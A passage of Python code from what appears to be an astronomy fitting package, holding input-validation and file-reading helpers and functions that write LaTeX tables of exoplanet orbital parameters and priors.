Given a string n, verify if it expresses a valid float.
Casting n to string in case an object of type float or similar is given as an argument
'''
return re.match(r'^-?\d*(\.\d+)?(E-?\d+)?$', str(n))
# Given a float or string, verify if it expresses an integer. Possible to introduce upper and lower bounds and if the inequalities on either side should be strong or weak .
def is_int(s,bounded=[False,False],bounds=[0,0],equal=[False,False]):
if is_float(s): # if it is an int, it is certainly float as well
n=float(s) # we need n as a number, not as a string, for comparisons with bounds later
is_an_int=float(s).is_integer()
else:
is_an_int=False
# is_an_int now contains an information if s is an int, but without bounds. Let's introduce bounds:
if(is_an_int): # if it's not an int at all we don't need to check any further
if(bounded[0]): # if there is a lower bound let's apply it
if (n<bounds[0] or (not equal[0] and n==bounds[0])):
is_an_int=False
if(is_an_int): # if the lower bound returned False we don't need to check any further
if(bounded[1]): # if there is a lower bound let's apply it
if (n>bounds[1] or (not equal[1] and n==bounds[1])):
is_an_int=False
return is_an_int
# If save_wrong_lines is enabled we will save a string 'wrong_line' instead of this line and save indices at which this occurred, otherwise we will skip this line
def convert_array_to_float(a,save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to float')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_float(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_float function should only contain floats! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(float(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
def convert_array_to_int(a, save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to int')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_int(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_int function should only contain ints! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(int(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
#for convenient reading of the input file
def read_file_as_array_of_arrays(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(0,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be place by the user as strings which end with a collon, in the comments use underline instead of space or an error will arise
c[ic].append(b[i][j])
ic=ic+1
#c = np.array(c, dtype=float)
return c
#for convenient reading of the input file the second is a hack so the mcmc lnL line is skipped! TBFixed
def read_file_as_array_of_arrays_mcmc(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(1,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be place by the user as strings which end with a collon, in the comments use underline instead of space or an error will arise
c[ic].append(float(b[i][j]))
ic=ic+1
c = np.array(c, dtype=float)
return c
def verify_array_with_bounds(ar,bounds):
'''Verify if values of array ar fit withind declared bounds, if too many/too few bounds do as much as can be done'''
if (len(ar)<=len(bounds)):
num=len(ar) # number of values to check
elif (len(ar)>len(bounds)):
num=len(bounds) # number of values to check
verification=True # initial value
for i in range(num):
# check if some of the values doesn't fit in the bounds, if so return False
if (ar[i]<bounds[i][0] or ar[i]>bounds[i][1]):
verification=False
break
return verification
def latex_pl_param_table(obj, width = 10, precision = 2, asymmetric = False, file_name='test.tex', path='./', return_text=False):
if asymmetric != True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i], max(np.abs(obj.param_errors.planet_params_errors[7*i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +1], max(np.abs(obj.param_errors.planet_params_errors[7*i +1])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +2], max(np.abs(obj.param_errors.planet_params_errors[7*i +2])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +3], max(np.abs(obj.param_errors.planet_params_errors[7*i +3])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +4], max(np.abs(obj.param_errors.planet_params_errors[7*i +4])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +5], max(np.abs(obj.param_errors.planet_params_errors[7*i +5])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +6], max(np.abs(obj.param_errors.planet_params_errors[7*i +6])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.t0[i], max(np.abs(obj.t0_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_rad[i], max(np.abs(obj.pl_rad_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_a[i], max(np.abs(obj.pl_a_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.a[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.mass[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.linear_trend),float(max(np.abs(obj.param_errors.linear_trend_error))) , width = 30, precision = 6)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.rv_quadtr),float(max(np.abs(obj.rv_quadtr_err))) , width = 30, precision = 6)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.offsets[i]), float(max(np.abs(obj.param_errors.offset_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.jitters[i]), float(max(np.abs(obj.param_errors.jitter_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_off[i]), float(max(np.abs(obj.tra_off_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_jitt[i]), float(max(np.abs(obj.tra_jitt_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
elif asymmetric == True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i], obj.param_errors.planet_params_errors[7*i][0], obj.param_errors.planet_params_errors[7*i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +1], obj.param_errors.planet_params_errors[7*i +1][0], obj.param_errors.planet_params_errors[7*i +1][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +2], obj.param_errors.planet_params_errors[7*i +2][0], obj.param_errors.planet_params_errors[7*i +2][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +3], obj.param_errors.planet_params_errors[7*i +3][0], obj.param_errors.planet_params_errors[7*i +3][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +4], obj.param_errors.planet_params_errors[7*i +4][0], obj.param_errors.planet_params_errors[7*i +4][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +5], obj.param_errors.planet_params_errors[7*i +5][0], obj.param_errors.planet_params_errors[7*i +5][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +6], obj.param_errors.planet_params_errors[7*i +6][0], obj.param_errors.planet_params_errors[7*i +6][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.t0[i], obj.t0_err[i][0], obj.t0_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_rad[i], obj.pl_rad_err[i][0], obj.pl_rad_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_a[i], obj.pl_a_err[i][0], obj.pl_a_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.a[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.mass[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.linear_trend),float(obj.param_errors.linear_trend_error[0]),float(obj.param_errors.linear_trend_error[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.rv_quadtr),float(obj.rv_quadtr_err[0]),float(obj.rv_quadtr_err[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.offsets[i]), obj.param_errors.offset_errors[i][0], obj.param_errors.offset_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.jitters[i]), obj.param_errors.jitter_errors[i][0], obj.param_errors.jitter_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_off[i]), obj.tra_off_err[i][0], obj.tra_off_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_jitt[i]), obj.tra_jitt_err[i][0], obj.tra_jitt_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
else:
print("asymmetric must be True or False")
return
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
def latex_prior_table(obj, width = 10, precision = 2, file_name='prior_table.tex', path='./', return_text = False):
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
if obj.K_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.K_norm_pr[i][0],obj.K_norm_pr[i][1],"$^2$"
elif obj.K_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.K_jeff_pr[i][0],obj.K_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.K_bound[i][0],obj.K_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
if obj.P_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.P_norm_pr[i][0],obj.P_norm_pr[i][1],"$^2$"
elif obj.P_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.P_jeff_pr[i][0],obj.P_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.P_bound[i][0],obj.P_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
if obj.e_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_norm_pr[i][0],obj.e_norm_pr[i][1],"$^2$"
elif obj.e_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_jeff_pr[i][0],obj.e_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_bound[i][0],obj.e_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.w_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.w_norm_pr[i][0],obj.w_norm_pr[i][1],"$^2$"
elif obj.w_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.w_jeff_pr[i][0],obj.w_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.w_bound[i][0],obj.w_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
if obj.M0_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.M0_norm_pr[i][0],obj.M0_norm_pr[i][1],"$^2$"
elif obj.M0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.M0_jeff_pr[i][0],obj.M0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.M0_bound[i][0],obj.M0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.hkl == True:
text = text + '''{0:{width}s}'''.format("$e\sin(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_sinw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_sinw_norm_pr[i][0],obj.e_sinw_norm_pr[i][1],"$^2$"
elif obj.e_sinw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_sinw_jeff_pr[i][0],obj.e_sinw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_sinw_bound[i][0],obj.e_sinw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e\cos(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_cosw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_cosw_norm_pr[i][0],obj.e_cosw_norm_pr[i][1],"$^2$"
elif obj.e_cosw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_cosw_jeff_pr[i][0],obj.e_cosw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_cosw_bound[i][0],obj.e_cosw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
